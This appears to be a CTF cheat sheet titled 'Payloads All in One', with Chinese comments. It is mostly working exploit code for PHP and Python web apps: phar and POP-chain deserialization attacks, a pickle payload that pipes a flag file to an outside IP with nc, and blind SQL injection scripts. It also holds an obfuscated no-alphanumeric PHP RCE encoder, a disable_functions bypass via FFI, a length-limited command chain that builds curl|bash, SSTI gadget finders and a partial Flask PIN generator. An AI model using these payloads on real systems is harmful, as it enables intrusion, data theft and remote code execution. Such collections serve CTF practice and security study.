Payloads All in One
arrange some payloads and exp in CTF game, maybe for Pentest as well.
Serialize/Unserialize
phar
<?php
class Flag
{
var $output = "";
}
$a = new test();
$a->output = "system('cat /flag');";
// 生成phar 文件的格式
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
other
<?php
/****************** pop 链, 目的就是获得admin 的密码,然后登陆得到flag
* link: http://119.23.206.8/index.php/archives/90/
* update.php 中,调用了User类中的 update方法,而lib.php 中的update方法中存在反序列化,反序列化的内容为getnewInfo方法
* safe(serialize(new Info($age,$nickname)));,而这个方法返回值是将post的参数age 和 nickname 作为info类的初始化对象,跟进这个类
* Info 类中存在__call 魔法函数,同样的在User类中存在_toString 魔法函数,调用了update方法,该方法是info 类中没有的,那么就让nickname 为
* info 类去触发__Call 魔法函数。如何触发__toString方法呢?
* 在Updaehelper 类中可以看到,这里直接将sql 当作字符串输出。如果sql 为User 类,那么就回触发__toString方法,然后让nickname 为info类,就会触发__call 魔法函数
* public function __destruct()
{
echo $this->sql;
}
* __call 是这样的 echo $this->CtrlCase->login($argument[0]); 调用了 login 方法 和 CtrlCase ,如果Ctrlcase 为 dbCtrl 然后就可以执行任意sql 语句了。
*
*
*
*/
error_reporting(0);
function safe($parm){
$array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");
return str_replace($array,'hacker',$parm); // 替换。那么就可能存在字符串逃逸,flag。
}
//$a = "union select password,nickename from users where username = 'admin'";
//$b = safe(serialize($a));
//echo $b;
class Info
{
public $age;
public $nickname;
public $CtrlCase;
public function __construct()
{
$this->CtrlCase = new dbCtrl(); // 链子最后的部分,执行sql语句
}
public function __call($name, $arguments)
{
echo $this->CtrlCase->login($argument[0]);
}
}
class User
{
public $id;
public $age=null;
public $nickname=null;
public function __construct()
{
$this->nickname = new Info(); // 触发 __toString
$this->age = 'select a,1 from where a!=? limit 1';
}
public function __toString()
{
$this->nickname->update($this->age);
}
}
class UpdateHelper
{
public $id;
public $newinfo;
public $sql;
public function __construct()
{
$sql = new User();
}
public function __destruct()
{
echo $this->sql;
}
}
class dbCtrl
{
public $hostname="127.0.0.1";
public $dbuser="root";
public $dbpass="root";
public $database="test";
public $name;
public $password;
public $mysqli;
public $token;
}
$info = new Info();
$info->age = '';
$info->nickname = '';
$info->CtrlCase = new UpdateHelper();
$info->CtrlCase->sql = new User();
$info->CtrlCase->sql->age = "select password,\"c4ca4238a0b923820dcc509a6f75849b\" from user where username=? or 1=1 limit 1";
$info->CtrlCase->sql->nickname->CtrlCase = new dbCtrl();
echo serialize($info);
$info->nickname = 'flag**********************************************************************************************";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:92:"select password,"c4ca4238a0b923820dcc509a6f75849b" from user where username=? or 1=1 limit 1";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";N;s:8:"password";i:1;s:6:"mysqli";N;s:5:"token";N;}}}}}';
$e = safe(serialize($info));
echo $e;
unserialize($e);
pickle
import pickle
import pickletools
import base64
import os
class Test(object):
def __reduce__(self):
return (os.system,('nc 174.1.142.80 2333 < flag.txt',))
test = Test()
print(base64.b64encode(pickle.dumps(test)))
pickletools.dis(pickle.dumps(test))
pickle without R
思路:
利用c 这个指令码进行全局变量包含
硬编码
b 指令码
比较贴近底层,压栈啥的,不是很好理解。等有能力再来补充。
SQL injection
error based
结合宽字节
-2%df' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
blind injection
时间盲注
import requests
url = 'http://d84fc07c-0e57-40c5-b34b-5fb7a8970774.node3.buuoj.cn/Less-49/?sort='
res = ''
chars = 'qwertyuiopasdfghjklzxcvbnm_1234567890@'
for j in range(1, 10):
#for k in range(32, 127):
for k in chars:
# print(k)
payload = "1' and if(substr((select database()),{},1)='{}',sleep(1),null) --+".format(j, k)
r = requests.get(url + payload)
print(r.url)
print(r.elapsed.total_seconds())
if str(r.elapsed.total_seconds()) > str(13):
res += k
print(res)
break
print('database is :' + res)
布尔型盲注
import requests
url = 'http://ed20f151-e439-4f27-96bc-e0c7029a8366.node3.buuoj.cn/Less-8/?id='
res = ''
for j in range(1,10):
for k in range(33, 127):
payload = "1' and (ascii(substr((select database()),{},1)))={} --+".format(j, k)
r = requests.get(url=url+payload)
# print(r.url)
print(r.url)
if 'You are in' in r.text:
res += chr(k)
print(res)
break
print(res)
# import time
# import requests
#
# url = "http://eci-2zedu9owieapit2qqdff.cloudeci1.ichunqiu.com/index.php"
# result = []
#
# for k in range(1, 20):
# for i in range(65, 126):
# payload = {"username": "admin\\", 'password': '||/**/greatest(ord(left(password,' + str(k) + ',1))' + str(i) + ')#'}
# req = requests.post(url=url, data=payload)
# if "账号或密码错误" in req.text:
# print(chr(i))
# result.append(chr(i))
# print(result)
# break
# print(result, end='')
import requests
import time
url = "http://eci-2zea89kqieujhhope4wn.cloudeci1.ichunqiu.com/"
name = ""
s = "qweratyuiopsdfghjklzxcvbnm_}{0123456789QWERATYUIOPSDFGHJKLZXCVBNM.-"
for i in range(1, 300):
for j in s:
z = name + j
zz = '^' + z
by = bytes(zz, 'UTF-8')
zzz = by.hex()
zzzz = '0x' + zzz
payload = "or/**/password/**/regexp/**/{}#".format(zzzz)
data = {
'username': 'admin\\',
'password': payload
}
r = requests.post(url, data=data)
print(payload)
if "flag" in r.text:
name += j
print(name)
break
if "flag" not in r.text:
print(name)
break
XSS
CSRF\CSS Injection
css injection poc:
逐字符猜解csrf-token
当然这需要目标站点x-frame-options
未被禁用。
那iframe被禁用了,还有办法注入吗。
相关工具:
upload webshell bypass
No num or alp Webshell/RCE
phpinfo
(AQAQVQV^trim(((((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i+!!@i)))+(((!!@i+!!@i))**((!!@i)))+((!!@i)))))();
<?php
// author: https://www.anquanke.com/post/id/207492
error_reporting(0);
$_00 = '((0).(0)){0}&((0/0).(1)){1}';//0000 0000
$_10 = '((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))';//0001 0000
$_20 = '(((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1})';//0010 0000 space
$_21 = '(((1).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0001 !
$_22 = '(((2).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0010 "
$_23 = '(((3).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0011 //
$_24 = '(((0/0).(1)){1}|((0).(4)){1})&(((3333/4).(0)){3})';//0010 0100 $
$_25 = '(((5).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0101 %
$_26 = '(((6).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0110 &
$_27 = '(((7).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0111 '
$_28 = '(((8).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 1000 (
$_29 = '(((9).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 1001 )
$_2a = '((((8).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))|((((2).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))';//0010 1010 *
$_2b = '((9999999999*999999999).(0)){12}';//0010 1011 +
$_2c = '((((0/0).(1)){1}|((0).(4)){1})&(((3333/4).(0)){3}))|((((8).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))';//0010 1100 ,
$_2d = '((((0/0).(1)){1}|((0).(4)){1})&(((3333/4).(0)){3}))|((((9).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))';//0010 1101 -
$_2e = '((3333/4).(0)){3}';//0010 1110 .
$_2f = '((3333/4).(0)){3}|((9999999999*999999999).(0)){12}';//0010 1111 /
$_30 = '((0).(0)){0}';//0011 0000 0
$_31 = '((1).(0)){0}';//0011 0001 1
$_32 = '((2).(0)){0}';//0011 0010 2
$_33 = '((3).(0)){0}';//0011 0011 3
$_34 = '((4).(0)){0}';//0011 0100 4
$_35 = '((5).(0)){0}';//0011 0101 5
$_36 = '((6).(0)){0}';//0011 0110 6
$_37 = '((7).(0)){0}';//0011 0111 7
$_38 = '((8).(0)){0}';//0011 1000 8
$_39 = '((9).(0)){0}';//0011 1001 9
$_3a = '(((8).(0)){0})|(((2).(0)){0})';//0011 1010 :
$_3b = '(((8).(0)){0})|(((3).(0)){0})';//0011 1011 ;
$_3c = '(((8).(0)){0})|(((4).(0)){0})';//0011 1100 <
$_3d = '(((8).(0)){0})|(((5).(0)){0})';//0011 1101 =
$_3e = '(((8).(0)){0})|(((6).(0)){0})';//0011 1110 >
$_3f = '(((8).(0)){0})|(((7).(0)){0})';//0011 1111 ?
$_40 = '((0/0).(1)){1}&((0/0).(1)){0}';//0100 0000 @
$A = '((0/0).(1)){1}';//0100 0001 A
$B = '(((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))';//0100 0010 B
$C = '((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))))';//0100 0011 C
$D = '(((0/0).(1)){0}&((9999999999*999999999).(0)){11})';// 0100 0100 D
$E = '((9999999999*999999999).(0)){11}';//0100 0101 E
$F = '(((1/0).(0)){2})';//0100 0110 F
$G = '(((0/0).(1)){1})|(((1/0).(0)){2})';//0100 0111 G
$H = '((((1/0).(0)){0})&((0/0).(1)){0})';//0100 1000 H
$I = '(((1/0).(0)){0})';//0100 1001 I
$J = '((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1010 J
$K = '(((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))))|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1011 K
$L = '((((0/0).(1)){0}&((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1100 L
$M = '((((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1101 M
$N = '((0/0).(1)){0}';//0100 1110 N
$O = '((0/0).(1)){1}|((0/0).(1)){0}';//0100 1111 O
$P = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){1}&((0/0).(1)){0})';//0101 0001 P
$Q = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){1})';//0101 0001 Q
$R = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0})))';//0101 0010 R
$S = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0})))))';//0101 0011 S
$T = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((0/0).(1)){0}&((9999999999*999999999).(0)){11}))';//0101 0100 T
$U = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((9999999999*999999999).(0)){11})';//0101 0101 U
$V = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((1/0).(0)){2}))';//0101 0110 V
$W = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((0/0).(1)){1})|(((1/0).(0)){2}))';//0101 0111 W
$X = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((1/0).(0)){0})&((0/0).(1)){0}))';//0101 1000 X
$Y = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((1/0).(0)){0}))';//0101 1001 Y
$Z = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1010 Z
$_5b = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))))|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1011 [
$_5c = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((0/0).(1)){0}&((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1100
$_5d = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1101 ]
$_5e = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){0})';//0101 1110 ^
$_5f = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){1}|((0/0).(1)){0})';//0101 1111 _
$_60 = '(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0110 0000 `
$a = '(((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1}';//0110 0001 a
$b = '(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1})';//0110 0010 b
$c = '((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))|((((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1})';//0110 0011 c
$d = '(((3333/4).(0)){3}|((0/0).(1)){1})&(((4).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0110 0100 d
$e = '((((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1})|(((9999999999*999999999).(0)){11})';//0110 0101 e
$f = '(((6).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 0110 f
$g = '(((0/0).(1)){1}|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 0111 g
$h = '(((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 1000 h
$i = '(((0/0).(1)){1}|((0).(9)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 1001 i
$j = '(((9999999999*999999999).(0)){12}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0110 1010 j
$k = '((9999999999*999999999).(0)){12}|((0/0).(1)){1}';//0110 1011 k
$l = '((((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1}))|((((3333/4).(0)){3}|((0/0).(1)){1})&(((4).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))))';//0110 1100 l
$m = '((((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1}))|(((((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1})|(((9999999999*999999999).(0)){11}))';//0110 1101 m
$n = '((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})';//0110 1110 n
$o = '((3333/4).(0)){3}|((0/0).(1)){1}';//0110 1111 o
$p = '((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0000 p
$q = '((0).(0)){0}|((0/0).(1)){1}';//0111 0001 q
$r = '((2).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0010 r
$s = '((0/0).(1)){1}|((0).(2)){1}';//0111 0011
$t = '((4).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0100 t
$u = '((0/0).(1)){1}|((0).(4)){1}';//0111 0101
$v = '((6).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0110 v
$w = '((0/0).(1)){1}|((0).(6)){1}';//0111 0111
$x = '((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 1000 x
$y = '((0/0).(1)){1}|((0).(9)){1}';//0111 1001
$z = '((((9999999999*999999999).(0)){12}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))|(((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0111 1010 z
$_7b = '(((1/0).(0)){0}|(((((-1).(0)){0})|(((0/0).(0)){1}))&((((1).(0)){0})|(((999**999).(1)){2}))))&((4).(0)){0}';//0111 1011 {
$_7c = '(((((0/0).(1)){0}&((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0})))|((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0111 1100 |
$_7d = '((1).(2)){1}|((1/0).(0)){0}';//0111 1101 }
$_7e = '(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})|((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0111 1110 ~
$_7f = '(((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1}';//0111 1111 7f
$_80 = '(((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~((~(((0/0).(1)){1}&((0/0).(1)){0}))|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&((~(((0/0).(1)){1}&((0/0).(1)){0}))|((0/0).(1)){1}))';//1000 0000
$_ff = '(~(((0/0).(1)){1}&((0/0).(1)){0}))|((0/0).(1)){1}';//1111 1111 ff
$payload = 'system(end(getallheaders()))'; // 在这里输入payload
$result = "";
$flag = True;
for($aa = 0;$aa < strlen($payload);$aa++){
if(ord($payload[$aa])>=ord('a') && ord($payload[$aa])<=ord('z')){
if($flag === True){
$flag = False;
$result .= "(";
}
$result .= "((${$payload[$aa]})).";
}
elseif($payload[$aa] === "(" or $payload[$aa] === ")"){
if($flag === False){
$result = substr($result, 0, strlen($result)-1) . ")";
$flag = True;
}
if($result[strlen($result)-1] === "."){
$result = substr($result, 0, strlen($result)-1) . $payload[$aa];
}
else{
$result .= $payload[$aa];
}
}
else{
if($flag === False){
$result = substr($result, 0, strlen($result)-1) . ")";
$flag = True;
}
$tmp = "_".strval(dechex(ord($payload[$aa])));
$result .= "((${$tmp})).";
}
}
if ($result[strlen($result)-1] !== ")"){
$result = substr($result, 0, strlen($result)-1);
}
$result .= ";";
echo urlencode($result);
?>
bypass disable_functions
php 7.4 FFI bypass
<?php
final class A implements Serializable
{
protected $data = [
'ret' => null,
'func' => 'FFI::cdef',
'arg' => 'int system(const char *command);'
];
private function run () {
$this->data['ret'] = $this->data['func']($this->data['arg']);
}
public function serialize (): string {
return serialize($this->data);
}
public function unserialize($payload) {
$this->data = unserialize($payload);
$this->run();
}
}
$payload = serialize(new A);
echo $payload;
bypass length limited RCE
4 Str limited RCE
from time import sleep
from urllib.parse import quote # 负责URL编码
import base64
import requests
payload = [
'>dir',
'>sl',
'>g\>',
'>ht-',
'*>v',
'>rev',
'*v>x',
'>\;\\',
'>sh\\',
'>ba\\',
'>\|\\',
'>x\\',
'>x\\',
'>x.\\',
'>x\\',
'>x.\\',
'>x\\',
'>x.\\',
'>11\\',
'>\ \\',
'>rl\\',
'>cu\\',
# 1xxxx.x.x.x
'sh x',
'sh g',
]
r = requests.get('http://121.36.222.22:88/core/clear.php')
cookiess = { # 请求时带上admin的 cookie
"PHPSESSID": "08e44553061c5dc2d0f47bece853784c"
}
for i in payload:
assert len(i) <= 4
data = {
"url": 'compress.zlib://data:@127.0.0.1/baidu.com?,' + quote(i) # 使用compress.zlib://data: 绕过data:// 对host的检测
}
r = requests.post('http://121.36.222.22:88/core/index.php', data=data, cookies=cookiess)
print(r.text)
sleep(0.1)
SSTI
find index
import requests
import re
import html
import time
for i in range(1, 1000):
url = "http://101.201.126.95:7050/{{[].__class__.__base__.__subclasses__()[" + str(i) + "]}}"
print(url)
r = requests.get(url)
# res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
# time.sleep(0.1)
# print(res)
# print(r.text)
# res = html.unescape(res[0])
# print(str(i) + " | " + res)
#print(r.content)
if "subprocess.Popen" in r.text:
print()
break
find system or file functions
from flask import Flask
from jinja2 import Template
# Some of special names
searchList = ['__init__', "__new__", '__del__', '__repr__', '__str__', '__bytes__', '__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__', '__hash__', '__bool__', '__getattr__', '__getattribute__', '__setattr__', '__dir__', '__delattr__', '__get__', '__set__', '__delete__', '__call__', "__instancecheck__", '__subclasscheck__', '__len__', '__length_hint__', '__missing__','__getitem__', '__setitem__', '__iter__','__delitem__', '__reversed__', '__contains__', '__add__', '__sub__','__mul__']
neededFunction = ['eval', 'open', 'exec']
pay = int(input("Payload?[1|0]"))
for index, i in enumerate({}.__class__.__base__.__subclasses__()):
for attr in searchList:
if hasattr(i, attr):
if eval('str(i.'+attr+')[1:9]') == 'function':
for goal in neededFunction:
if (eval('"'+goal+'" in i.'+attr+'.__globals__["__builtins__"].keys()')):
if pay != 1:
print(i.__name__,":", attr, goal)
else:
print("{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='" + i.__name__ + "' %}{{ c." + attr + ".__globals__['__builtins__']." + goal + "(\"[evil]\") }}{% endif %}{% endfor %}")
Flask debug mode find pin
import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb', # username
'flask.app', # modname
'Flask', # getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'2485410451622', # str(uuid.getnode()), /sys/class/net/eth0/address
'1408f836b0ca514d796cbf8960e45fa1' # get_machine_id(), /etc/machine-id
]
